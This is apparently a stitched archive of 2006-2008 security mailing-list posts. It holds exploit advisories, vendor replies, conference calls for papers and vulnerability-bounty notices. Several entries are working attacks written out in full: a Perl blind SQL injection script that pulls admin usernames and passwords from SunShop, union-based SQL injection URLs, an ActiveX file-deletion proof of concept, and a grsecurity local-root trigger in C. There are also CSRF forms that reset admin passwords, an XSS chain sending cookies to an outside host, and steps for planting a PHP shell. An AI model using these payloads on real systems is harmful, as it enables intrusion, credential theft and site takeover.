Center 9.2 (Unconfirmed) - Severity High: user has higher capability than defined by their profile * Quality Center 9.0 Patch 17 - Severity Highly Critical: a user (even with a Viewer profile) can amend the data rendering it useless. He will also have higher capability than defined by their profile * Quality Center 8.2 / 8.0 (Unconfirmed) - Severity Highly Critical: a user (even with a Viewer profile) can amend the data rendering it useless. He will also have higher capability than defined by their profile * TestDirector (Any Version) - TestDirector is the former name of Quality Center - Potentially the same issues as for Quality Center 9.0 Patch 17 Please note that HP has released a patch that fixes this issue, please contact HP support for further details. Example This really short example shows how a user can simply change the content of all the defects to some meaningless values: Sub Defects_Bug_MoveTo Set objCommand = TDConnection.Command objCommand.CommandText = UPDATE BUG SET BG_SUMMARY='Useless', BG_DESCRIPTION='Useless' objCommand.Execute End Sub Other Information - Discovered By: Exposit Limited Internet:http://www.exposit.co.uk Exposit Limited is a functional testing consultancy company specialized in HP (formely Mercury) Testing Tools.
Hack.lu 2008 CfP
Call for Papers Hack.lu 2008 The purpose of the hack.lu convention is to give an open and free playground where people can discuss the implication of new technologies in society. hack.lu is a balanced mix convention where technical and non-technical people can meet each others and share freely all kind of information. The convention will be held in the Grand-Duchy of Luxembourg in October 2008 (22-24.10.2008). Scope == Topics of interest include, but are not limited to : * Software Engineering and Security * Honeypots/Honeynets * Spyware, Phishing and Botnets (Distributed attacks) * Newly discovered vulnerabilities in software and hardware * Electronic/Digital Privacy * Wireless Network and Security * Attacks on Information Systems and/or Digital Information Storage * Electronic Voting * Free Software and Security * Assessment of Computer, Electronic Devices and Information Systems * Standards for Information Security * Legal and Social Aspect of Information Security * Software Engineering and Security * Security in Information Retrieval * Network security * Forensics and Anti-Forensics * Mobile communications security and vulnerabilities Deadlines = The following dates are important if you want to participate in the CfP Abstract submission : no later than 1 July 2008 Full paper submission : no later than 1st August 2008 Notification date : around end of August Submission guideline (for standard paper track) Authors should submit a paper in English up to 5.000 words, using a non-proprietary and open electronic format. The program committee will review all papers and the author of each paper will be notified of the result, by electronic means. Abstract is up to 400 words. Submissions must be sent via the http://www.hack.lu/ website. Submissions should also include the following: 1. Presenter, and geographical location (country of origin/passport)and contact info. 2. Employer and/or affiliations. 3. Brief biography, list of publications or papers. 4. Any significant presentation and/or educational experience/background. 5. Reason why this material is innovative or significant or an important tutorial. 6. Optionally, any samples of prepared material or outlines ready. 7. Information about if yes or no the submission has already been presented and where. The information will be used only for the sole purpose of the hack.lu convention including the information on the public website. If you want to remain anonymous, you have the right to use a nickname. (Accepted) Speakers' Privileges * Accommodation will be provided (3 nights) * Travel expenses will be covered * Conference speakers night Publication and rights == Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for the hack.lu convention and its related electronic/paper publication. Sponsoring == If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to info(AT)hack.lu Web site == http://www.hack.lu/ Barcamp and interactive session During the conference, there is a continuous interactive session. You are also very welcome to participate to submit small ideas, presentation or poster. The review process is simplified and open to anyone willing to take an active role during the conference. You can submit your proposal using the same web interface for the barcamp but you don't require to submit a full paper. Submissions are done via the hack.lu website (http://www.hack.lu/) The hack.lu conference is organized by the ASBL CSRRT-LU (Computer Security Research and Response Team Luxembourg)
SunShop Version 3.5.1 Remote Blind Sql Injection
#!/usr/bin/perl -w
use LWP::UserAgent;
# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Discovered
# By : irvian
# site : http://irvian.cn
# email : [EMAIL PROTECTED]
print \r\n[+]-[+]\r\n;
print [+]Blind SQL injection [+]\r\n;
print [+]SunShop Version 3.5.1 [+]\r\n;
print [+]code by irvian [+]\r\n;
print [+]special : ifx, arioo, jipank, bluespy [+]\r\n;
print [+]-[+]\n\r;
if (@ARGV 5){
die
Cara Mengunakan : perl $0 host option id tabel itemid
Keterangan
host : http://victim.com
Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password
id : Isi Angka Kolom id biasanya 1, 2 ,3 dst
tabel : Isi Kolom tabel biasanya admin atau ss_admin
itemid : Isi Angka valid (ada productnya) di belakang index.php?action=itemid=
Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10
\n;}
$url = $ARGV[0];
$option = $ARGV[1];
$id = $ARGV[2];
$tabel = $ARGV[3];
$itemid = $ARGV[4];
if ($option eq 1){
syswrite(STDOUT, username: , 10);}
elsif ($option eq 2){
syswrite(STDOUT, password: , 10);}
for($i = 1; $i = 32; $i++){
$f = 0;
$n = 32;
while(!$f $n = 57)
{
if(blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
if ($f==0){
$n = 97;
while(!$f $n = 122)
{
if(blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
}
}
print \n[+]finish Execution Exploit\n;
sub blind {
my $site = $_[0];
my $op = $_[1];
my $id = $_[2];
my $tbl = $_[3];
my $i = $_[4];
my $n = $_[5];
my $item = $_[6];
if ($op eq 1){
$klm = username;
}
elsif ($op eq 2){
$klm = password;
}
my $ua = LWP::UserAgent-new;
my $url =
$site./index.php?action=itemid=.$item.'%20AND%20SUBSTRING((SELECT%20.$klm.%20FROM%20.$tbl.%20WHERE%20id=.$id.),.$i.,1)=CHAR(.$n.)/*;
my $res = $ua-get($url);
my $browser = $res-content;
if ($browser !~ /This product is currently not viewable/i){
return 1;
}
else {
return 0;
}
}
Zune software - arbitrary file overwrite
Vulnerability class : Arbitrary file overwrite
Discovery date : 21 April 2008
Remote : Yes
Credits : J. Bachmann B. Mariani from ilion Research Labs
Vulnerable : Zune software: EncProfile2 Class
An arbitrary file overwrite as been discovered in an ActiveX control installed
with the Zune software package.
If a user visits the malicious page and authorize the control to run (it is not
marked safe for scripting), the attacker can erase an arbitrary file.
POC:
HTML
BODY
object id=ctrl
classid=clsid:{0B1C3B47-207F-4CEA-8F31-34E4DB2F6EFD}/object
SCRIPT
function Do_it()
{
File = c:\\boot_.ini
ctrl.SaveToFile(File)
}
/SCRIPT
input language=JavaScript onclick=Do_it() type=button value=Proof of
Concept
/BODY
/HTML
Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability
# ##Easy-Clanpage v2.2 ### # SQL #304;njection VuLnerabiLity ## ## # # # # # AUTHOR : MadNet # # HOMEPAGE : http://www.Shadowturk.org/ # # Mail : MadNet[at]hackertr[dot]org # # # #Source: http://easy-clanpage.de/?section=downloadsshow=viewdownloadid=14 # # #Dork :Easy-Clanpage v2.2 ## #Vunl File : # #/inc/module/online.php # #EXPLOIT : # #http://www.[site].com/[path]/?section=useraction=detailsid= # #EXAMPLE : # #-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/* # ## #www.ShadowTURK.Org ## Thanks : Str0ke and Milw0rm ##
Digital Armaments March-April Hacking Challenge: 5,000$ Prize - Client Vulnerabilities and Exploit
Digital Armaments March-April Hacking Challenge: 5,000$ Prize - Client Vulnerabilities and Exploit Pubblication is 03.15.2008 http://digitalarmaments.com//content/view/46/27/ I. Details Digital Armaments officially announce the launch of March-April hacking challenge. The challenge starts on March 1. For the March-April Challenge, Digital Armaments will give a prize of 5,000$ for each submission that results in a Exploitable Vulnerability or Working Exploit for Windows or Windows Diffuse Application. This should include example and documentation. The submission must be sent during the March/April months and be received by midnight EST on April 30, 2008. The 5,000$ PRIZE will be an extra added to the normal vulnerability payment (check the DACP scheme). II. References For further information on Digital Armaments Contributor Program (DACP) please refer at the contribute section. Details of credits value can be found at the contribute section and in the FAQs section. III. Legal Notices Copyright © 2008 Digital Armaments Inc. Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprint the whole is allowed, partial reprint is not permitted. For any other request please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
LiveCart XSS vulnerability fixed since version 1.1.0
This issue has been resolved since version 1.1.0: http://livecart.com/news/Major-update-LiveCart-1-1-0.8
Digital Armaments January-February Hacking Challenge: Special 20.000$ Prize - Windows Vulnerabilities and Exploit
Digital Armaments January-February Hacking Challenge: Special 20.000$ Prize - Windows Vulnerabilities and Exploit Challenge pubblication is 01.04.2008 http://www.digitalarmaments.com/challenge200801566321.html I. Details Digital Armaments officially announce the launch of January-February hacking challenge. The challenge starts on January 1. For the January-february Challenge, Digital Armaments will give a SPECIAL PRIZE of 20.000$ for each submission that results in a Exploitable Vulnerability or Working Exploit for Windows or Windows Diffuse Application. This should include example and documentation. The submission must be sent during the January/February months and be received by midnight EST on February 29, 2008. The 20.000$ PRIZE will be an extra added to the normal vulnerability payment (check the DACP scheme). II. References For further information on Digital Armaments Contributor Program (DACP) please refer at: http://www.digitalarmaments.com/contribute.html Details of credits value can be found at: http://www.digitalarmaments.com/contribute.html#credit III. Legal Notices Copyright © 2008 Digital Armaments Inc. Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprint the whole is allowed, partial reprint is not permitted. For any other request please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Digital Armaments November-December Hacking Challenge: Diffuse Client Application (10.000$ extra)
Digital Armaments November-December Hacking Challenge: Diffuse Client Application Challenge Pubblication 11.29.2007 http://www.digitalarmaments.com/challenge200711849505.html I. Details Digital Armaments officially announce the launch of November-December hacking challenge. The challenge starts on November 1. For the November-December Challenge, Digital Armaments will give 10.000$ and 5000 credits EXTRA for each submission that results in a Diffuse Client Application (example: Internet Explorer, Firefox, Safari, Microsoft Office, Winzip, Zip, MSN, Skype) Vulnerability. This should include example and documentation. The submission must be sent during the November/December months and be received by midnight EST on December 31, 2007. The 10.000$ and 5000 credits will be an extra added to the normal vulnerability payment (check the DACP scheme). II. References For further information on Digital Armaments Contributor Program (DACP) please refer at: http://www.digitalarmaments.com/contribute.html Details of credits value can be found at: http://www.digitalarmaments.com/contribute.html#credit III. Legal Notices Copyright © 2007 Digital Armaments Inc. Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprint the whole is allowed, partial reprint is not permitted. For any other request please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
VigileCMS 1.4 Multiple Remote Vulnerabilities
VigileCMS 1.4 Multiple Remote Vulnerabilities --- --- Author : DevilAuron (http://devilsnight.altervista.org) Vendor : VigileCMS 1.4 Date : [16-11-2007] (dd-mm-) Permanent Xss: --- http://[site]/[path]/index.php?module=vedipminviapm=true http://[site]/[path]/index.php?module=live_chat Insert on the message the xss Local File Inclusion: --- http://[site]/[path]/index.php?module=[somefile]%00 CSRF: --- form name=cambia method=post action=http://127.0.0.1/VIGILE_1.4/index.php?module=changepass; input type=password name=new1 maxlength=20 value=123456 input type=password name=new2 maxlength=20 value=123456 input type=hidden name=pw value=Cambia la Password /form scriptdocument.cambia.submit()/script !-- This change the Admin password -- ---
new vuln in snewscms.net.ru in lang file
New Advisory: Snewscms Rus http://www.medconsultation.ru Summary Software: SnewsCMS Rus v. 2.1 Sowtware's Web Site: http://www.snewscms.net.ru Versions: 2.1 Critical Level: Moderate Type: XSS Class: Remote Status: Unpatched PoC/Exploit: Not Available Solution: Not Available Discovered by: http://medconsultation.ru -Description--- 1. XSS. Vulnerable script: news_page.php Parameters 'page_id' is not properly sanitized before being used in HTML tags. http://target.com/news_page.php?page_id=;h1XSS/h1 --PoC/Exploit-- Waiting for developer(s) reply. --Solution- No Patch available. --Credit--- Discovered by: http://www.medconsultation.ru
hack.lu 2007 18-20 October, Luxembourg
Dear Information Security Freaks, This is to announce that the line-up of the speakers and their subjects is finally up in a draft version on hack.lu 2007 (http://www.hack.lu/). Have a look and register as space is limited and prices go up progressively. We managed again to have speakers from all over the world coming to Luxembourg, the small country in Europe. There is a large diversity of interesting topics covered during the three days of this intimate security conference. This year we will also have a Capture The Flag contest organized by the Kenshoto group running from the beginning of the conference. If you want to test your skills, it's now or never. There is also a Hack/Barcamp on the first day where we can have a participatory workshop-event in an open atmosphere with no limits or boundaries on the information security aspects. We really hope to see you there. Your hack.lu team
Digital Armaments 2007 September-October Hacking Challenge: Symbian
Digital Armaments September-October Hacking Challenge: Symbian Challenge pubblication 09.04.2007 http://www.digitalarmaments.com/challenge200709362386.html I. Details Digital Armaments officially announce the launch of September-October hacking challenge. The challenge starts on September 1. For the September-October Challenge, Digital Armaments will give 5000 credits EXTRA for each submission that results in a Symbian Vulnerability. This should include example and documentation. The submission must be sent during the September/October months and be received by midnight EST on October 31, 2007. The 5000 credits will be an extra added to the normal vulnerability payment (check the DACP scheme). II. References For further information on Digital Armaments Contributor Program (DACP) please refer at: http://www.digitalarmaments.com/contribute.html Details of credits value can be found at: http://www.digitalarmaments.com/contribute.html#credit III. Legal Notices Copyright © 2007 Digital Armaments Inc. Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprint the whole is allowed, partial reprint is not permitted. For any other request please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Re: InterWorx-CP Multiple HTML Injections Vulnerabilitie
InterWorx 3.0.3 has been released that addresses this problem. http://interworx.com/forums/showthread.php?t=2501
Re: Menu Manager Mod for WebAPP - No Input Filtering
The issue is not yet secure at http://www.web-app.org 1.) Guests can edit files on the server by: http://victim-domain/cgi-bin/index.cgi?action=menu - There are approximately 35 webapporg sites of version 0.9.9.7 defaced with the issue. So it couldn't possibly be fixed for 0.9.9.7 as claimed above. 2.) Members/guests can add $values in the menu form. Allowing $ is madness, its it can be exploited to run direct cmd on the Perl shell. I tried posting a message about it before here but it was unnoticed and never published. Kind regards On Elpeleg WebAPP
Re: LuckyBot v3 Remote File Include
this won't work, unless register globals is on, and on almost every webhost with PHP5, does not have register_globals on. So what a stupid exploit.
Re: UPDATED: CubeCart (v3.0.15) - CRLF Injection Vulnerability
3.0.16 will be released later today. Simple str_replace to fix in
includes/session.inc.php and treatGet function on $_GET['ccUser'].
## remove possible CRLF injection
$sessId = str_replace(array('%0d', '%0a'), '', $sessId);
Please report any potential security issues directly to us in the future rather
than making them public immediately.
Digital Armaments May-June-2007 Hacking Challenge: VMware
Digital Armaments May-June Hacking Challenge: VMware Challenge Publication is 09.05.2007 http://www.digitalarmaments.com/challanges_open.html I. Details Digital Armaments officially announce the launch of May-June hacking challenge. The challenge starts on May 1. For the May-June Challenge, Digital Armaments will give 5000 credits EXTRA plus 2500$ EXTRA for each submission that results in a VMware High Risk Vulnerability. This should include example and documentation. The submission must be sent during the May/June months and be received by midnight EST on June 30, 2007. The 5000 credits plus the 2500$ will be an extra added to the normal vulnerability payment (check the DACP scheme). II. References For further information on Digital Armaments Contributor Program (DACP) please refer at: http://www.digitalarmaments.com/contribute.html Details of credits value can be found at: http://www.digitalarmaments.com/contribute.html#credit III. Legal Notices Copyright © 2007 Digital Armaments Inc. Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprint the whole is allowed, partial reprint is not permitted. For any other request please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Re: 12All File Upload Vulnerability
FCKEditor fixed in version 4.54. User needed to be logged in as an ADMIN user to be able to use this vulnerability.
blogsystem 1.4 local remote = -rfi lfi -xss
demo: blog23.com by : hackerz.ir userz ! ADMIN/index.php include($category./.$folder._.$page..php); ADMIN/index.php include($category./.$action..php); ADMIN/login.php include($lngTexts); ADMIN/login.php include($lngConfig); BO/index.phpinclude($category./.$folder._.$page..php); BO/index.phpinclude($category./.$action..php); BO/login.phpinclude($lngTexts); BO/login.phpinclude($lngConfig); for example remote : ++ login to your user after that u can user exploit ADMIN/index.php include($category./.$folder._.$page..php); + local file include remote file include in admin panel BO/login.phpinclude($lngTexts); BO/login.phpinclude($lngConfig);
CfP Hack.lu 2007
Call for Papers Hack.lu 2007 The purpose of the hack.lu convention is to give an open and free playground where people can discuss the implication of new technologies in society. hack.lu is a balanced mix convention where technical and non-technical people can meet each others and share freely all kind of information. The convention will be held in the Grand-Duchy of Luxembourg in October 2007 (18-20.10.2007). Scope == Topics of interest include, but are not limited to : * Software Engineering and Security * Honeypots/Honeynets * Spyware, Phishing and Botnets (Distributed attacks) * Newly discovered vulnerabilities in software and hardware * Electronic/Digital Privacy * Wireless Network and Security * Attacks on Information Systems and/or Digital Information Storage * Electronic Voting * Free Software and Security * Assessment of Computer, Electronic Devices and Information Systems * Standards for Information Security * Legal and Social Aspect of Information Security * Software Engineering and Security * Security in Information Retrieval * Network security Deadlines = The following dates are important if you want to participate in the CfP Abstract submission : no later than 1 June 2007 Full paper submission : no later than 15 July 2007 Notification date : around end of July beginning of August Submission guideline Authors should submit a paper in English up to 5.000 words, using a non-proprietary and open electronic format. The program committee will review all papers and the author of each paper will be notified of the result, by electronic means. Abstract is up to 400 words. Submissions must be sent to : hack2007-paper(AT)hack.lu Submissions should also include the following: 1. Presenter, and geographical location (country of origin/passport)and contact info. 2. Employer and/or affiliations. 3. Brief biography, list of publications or papers. 4. Any significant presentation and/or educational experience/background. 5. Reason why this material is innovative or significant or an important tutorial. 6. Optionally, any samples of prepared material or outlines ready. The information will be used only for the sole purpose of the hack.lu convention including the information on the public website. If you want to remain anonymous, you have the right to use a nickname. Speakers' Privileges * Accommodation will be provided (max 3 nights) * Travel expenses will be covered * Conference speakers night * speakers goodies... Program Committee = http://www.hack.lu/index.php/ProgramCommittee Publication and rights == Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for the hack.lu convention and its related electronic/paper publication. Sponsoring == If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to info(AT)hack.lu Web site and wiki = http://www.hack.lu/
Re: bloofoxCMS 0.2.2 Remote File Include Vulnerabilitiy
variable $content_php is set in php code and should overwrite any user made inserts in url. i think this is not a vulnerability, is it?
Digital Armaments Security Advisory 20.01.2007: Grsecurity Kernel PaX Vulnerability
Digital Armaments advisory is 01.20.2007
http://www.digitalarmaments.com/2007200184936274.html
I. Background
grsecurity is an innovative approach to security utilizing a multi-layered
detection, prevention, and containment model. It is licensed under the GPL.
For further information or detail about the software you can refer to the
vendor's homepage:
http://www.grsecurity.net/
II. Problem Description
A vulnerability exist in expand_stack() of grsecurity patch. This vulnerability
allow local privilege escalation.
III. Details
The problem persist in the expand_stack() function:
[0]kdb b
Stack traceback for pid 29939
0xce9f6560 29939 16112 1 0 R 0xce9f6730 *bugpax
EBP EIP Function (args)
0xced1ed24 0xc0197e57 find_vma+0x27 (0xce5350e4, 0x5000, 0xced1ed60,
0xce9f6560, 0x7b)
0xced1ed60 0xc01981aa expand_stack+0x13a (0xce9f6560, 0xcdcfc9c0, 0x0,
0xcffcfaa0, 0x0)
0xced1ee3c 0xc0157829 do_page_fault+0x2b9 (0xce5350e4, 0x0, 0x0, 0xce535110,
0xcdcfc6e8)
0xc014543b error_code+0x2b
Interrupt registers:
SS trap at 0xc0197e82 (find_vma+0x52)
0xc0197e82 find_vma+0x52: ret
[0]kdb
SS trap at 0xc01981aa (expand_stack+0x13a)
0xc01981aa expand_stack+0x13a: test %eax,%eax
[0]kdb r
eax = 0xcdcfc6e8 ebx = 0x ecx = 0xcdcfc6e8 edx = 0xcdcfc700
esi = 0xcdcfc9c0 edi = 0xcdcfc9c0 esp = 0xced1ed2c eip = 0xc01981aa
ebp = 0xced1ed60 xss = 0x0068 xcs = 0x0060 eflags = 0x0286
xds = 0x007b xes = 0x007b origeax = 0x regs = 0xced1ecf8
[0]kdb vm 0xcdcfc6e8
struct vm_area_struct at 0xcdcfc6e8 for 92 bytes
vm_start = 0x5000 vm_end = 0x60004000
vm_page_prot = 0x25
vm_flags: READ WRITE EXEC MAYREAD MAYWRITE MAYEXEC GROWSDOWN
[0]kdb
The bug generate a crash here:
Stack traceback for pid 31494
0xcea9d020 31494 4536 1 0 R 0xcea9d1f0 *bugpax
EBP EIP Function (args)
0xc4d70de4 0xc019923f exit_mmap+0x17f (0xce50634c, 0xce50634c, 0xce506378)
0xc4d70df8 0xc0160144 mmput+0x34 (0xce50634c, 0x2b, 0xc4d7, 0xcea9d020,
0xcea9d4d8)
0xc4d70e14 0xc01647f4 exit_mm+0xb4 (0xcea9d020, 0x7, 0x6, 0x0, 0x1)
0xc4d70e40 0xc0165238 do_exit+0xb8 (0xc4d70ec0, 0x7, 0xc4d70f60, 0xc4d7)
0xc4d70e58 0xc016559c do_group_exit+0x3c (0x7, 0x7, 0xc4d70f60, 0xcf4d55a0,
0xc4d7)
0xc4d70e84 0xc016efa6 get_signal_to_deliver+0x1f6 (0xc4d70ec0, 0xc4d70ea0,
0xc4d70f60, 0x0, 0x5fbc)
0xc4d70f4c 0xc0144124 do_signal+0x74 (0x278aaff4)
0xc4d70f58 0xc01441fd do_notify_resume+0x3d
0xc01443de work_notifysig+0x13
Use the following proof code to trigger the vulnerability:
/*
** expand_stack() PaX local root vulnerability
** Vulnerability trigger.
**
** Copyright (C) 2007
** Digital Armaments Inc. - www.digitalarmaments.com
*/
#define _GNU_SOURCE
#include unistd.h
#include signal.h
#include stdio.h
#include sched.h
#include fcntl.h
#include asm/page.h
#include sys/types.h
#include sys/stat.h
#include sys/mman.h
#include sys/wait.h
#define KBASE 0xc000
#define SEGMEXEC_TASK_SIZE (KBASE / 2)
#define LOSTPAGE_SIZE (PAGE_SIZE * 3)
#define MAP1_BASE 0x4000
#define MAP2_BASE MAP1_BASE - LOSTPAGE_SIZE
#define PF_BASE MAP1_BASE + SEGMEXEC_TASK_SIZE - 0x4000
#define PAGE_GROW_NB 10
static char ucode [40] = \xbe\x00\xF0\xFF\x5F\x83\x3e\x2a;
void mouarf (int signum)
{
char * str = (char *) (MAP1_BASE + 600);
memset ((void *)(MAP1_BASE + 600), 0x90, 40);
str [26] = 0xc3; /* ret */
return;
}
int main( void )
{
int i = 1;
void (* p)();
signal (SIGBUS, mouarf);
if( mmap( (void *) MAP1_BASE, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED |
MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN, 0, 0 ) == (void *) -1 )
{
perror( mmap map1 base\n );
return( 1 );
}
if( mmap( (void *) 0x0, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED |
MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN, 0, 0 ) == (void *) -1 )
{
perror( mmap 0x0 failed\n );
return( 1 );
}
if( mprotect( (void *) MAP1_BASE, PAGE_SIZE,
PROT_READ | PROT_WRITE | PROT_EXEC ) 0 )
{
perror( mprotect map1 base );
fprintf( stderr, run chpax -m on this executable\n );
return( 1 );
}
* (int *) (ucode + 1) = (SEGMEXEC_TASK_SIZE - (PAGE_SIZE * i));
memcpy ((void *)(MAP1_BASE + 600), ucode, 20);
p = (void *) MAP1_BASE + 600;
printf (-- about to fault on %X\n, SEGMEXEC_TASK_SIZE - (PAGE_SIZE * i));
p ();
printf (Overlaping the kernel by %d pages\n, i);
fflush( stdout );
printf (Calling munmap ... %X, %x\n, 0x2000, 0x1000);
if (munmap (0x2000, 0x1000) 0 )
perror (munmap);
// printf (Calling mremap ... \n);
// if (mremap (0x2000, 0x1000, 0x1, MREMAP_MAYMOVE) 0 )
// perror (mremap);
printf (PID:%d, sleeping\n, getpid ());
sleep (2000);
return( 0 );
}
IV. Impact analysis
Successful exploitation allow an attacker to obtain local root privileges. The
impact is high, due to grsecurity should prevent any form of code execution and
privilege escalation.
V. Legal Notices
Copyright © 2007 Digital Armaments Inc.
Redistribution of this alert electronically is allowed. It should not be edited
in any way. Reprint the whole is allowed, partial reprint is not permitted. For
any
phpBB (privmsg.php) XSS Exploit
phpBB (privmsg.php) XSS Exploit
By: Demential
Web: http://headburn.altervista.org
E-mail: [EMAIL PROTECTED]
PhpBB website: http://phpbb.com
Exploit tested on phpBB 2.0.21
Secunia.com said:
Input passed to the form field Message body in privmsg.php
is not properly sanitised before it is returned to the user
when sending messages to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.
The Exploit:
Create a Shockwave Flash file with this code:
var username:String = user_that_doesnt_exist;
var subject:String = Xss Exploitation;
var message:String = /textareascriptdocument.location=
'http://site.com/cookie.php?c=' + document.cookie /script;
var folder:String = inbox;
var mode:String = post;
var post:String = Submit;
getURL(http://victim.com/phpBB2/privmsg.php;, _self, POST);
Put it into a web page:
html
head
titlePut a title here/title
/head
body
pPut some text herep
iframe src=http://yoursite.com/exploit.swf; frameborder=0 height=0
width=0/iframe
/body
/html
And send it to the admin (or a normal user)
users must be logged-in.
Fixing:
open phpBB2/privmsg.php
find:
if (!($to_userdata = $db-sql_fetchrow($result)))
{
$error = TRUE;
$error_msg = $lang['No_such_user'];
replace with:
if (!($to_userdata = $db-sql_fetchrow($result)))
{
$error = TRUE;
echo Sorry, but no such user exists.;
exit;
Digital Armaments Security Pre-Advisory 11.01.2007: Grsecurity Kernel PaX - Local root vulnerability
Digital Armaments pre-advisory is 01.10.2007 http://www.digitalarmaments.com/pre2007-00018659.html Digital Armaments realease pre-advisory of vulnerabilties and exploit avaiable only to Platinum Subscriptors. The full-advisory will might be released to the public after 6 months. I. Background grsecurity is an innovative approach to security utilizing a multi-layered detection, prevention, and containment model. It is licensed under the GPL. For further information or detail about the software you can refer to the vendor's homepage: http://www.grsecurity.net/ II. Problem Description A vulnerability exist in expand_stack() of grsecurity patch. This vulnerability is exploitable only locally. III. Impact analysis Successful exploitation allow an attacker to obtain local root privileges. The impact is high, due to grsecurity should prevent any form of code execution and privilege escalation. A working exploit is available. IV. Credit Anonymous. Get paid and get stocks by vulnerability submission http://www.digitalarmaments.com/contribute.html V. Legal Notices Copyright © 2007 Digital Armaments Inc.. Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprint the whole is allowed, partial reprint is not permitted. For any other request please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
MKPortal Full Path Disclosure
MkPortal Full Path Disclosure Vulnerability discovered by: Demential Web: http://headburn.altervista.org E-mail: info[at]burnhead[dot]it Mkportal website: http://www.mkportal.it Tested on MKPortal M1.1 RC1 with PhpBB other versions may also be affected. http://www.victim.com/mkportal/admin.php?MK_PATH=1 Warning: main(mkportal/include/mk_mySQL.php): failed to open stream: No such file or directory in D:\inetpub\webs\victimcom\mkportal\include\PHPBB\php_driverf.php on line 24
MkPortal Admin XSS
MkPortal Admin XSS Discovered by: Demential Web: http://headburn.altervista.org E-mail: info[at]burnhead[dot]it Mkportal website: http://www.mkportal.it Go to: /mkportal/admin.php?ind=ad_contentsop=contents_new In both fields write: scriptalert(document.cookie)/script and press save. Alert will appear here: /mkportal/admin.php?ind=ad_contents and here: /mkportal/admin.php?ind=ad_contentsop=contents_editidc=* where * is the ID of the page.
MkPortal All Guests are Admin Exploit
MkPortal All Guests are Admin Exploit Vulnerability discovered and exploited by: Demential Web: http://headburn.altervista.org E-mail: info[at]burnhead[dot]it Mkportal website: http://www.mkportal.it Start Macromedia Flash and create an swf file with this code: var idg:Number = 9; var p13:Number = 1; var Salva:String = Save+Permissions; getURL(http://victim.com/mkportal/admin.php?ind=ad_permsop=save_main;, _self, POST); Translate Save+Permissions in MKPortal language. Example: Salva+questi+permessi for italian sites. Then upload the swf file to a webserver and create an html page like this: html head titlePut a title here/title /head body pPut some text herep iframe src=http://yoursite.com/exploit.swf; frameborder=0 height=0 width=0/iframe /body /html Now send the html page to MKPortal administrator. When admin opens the page all guests will be able to administrate MKPortal. So you can go here: http://victim.com/mkportal/admin.php?ind=ad_contentsop=contents_new_php and paste a php shell or a backdoor. You can find your shell here: http://victim.com/mkportal/cache/ppage_*.php where * is the ID of the page. Translate page in MKPortal language. Example: pagina for italian sites.
Re: PlatinumFTP 1.0.18 remote DoS
I have spent the last year rewriting the server and it should now Dos free. I have tested against all known vulnerabilities and cant crash the software. Please download from www.platinumftp.com and let me know if you find any more.
MkPortal Urlobox Cross Site Request Forgery
MkPortal Urlobox Cross Site Request Forgery Discovered by: Demential Web: http://www.burnhead.it E-mail: [EMAIL PROTECTED] Mkportal website: http://www.mkportal.it posting [img]?ind=urloboxop=deleteidurlo=X[/img] in MkPortal urlobox where X is an ID of a message, when administrator opens urlobox page message X will be erased.
Digital Armaments Security Advisory 07.12.2006: Yahoo multiple services authentication bypass Vulnerability
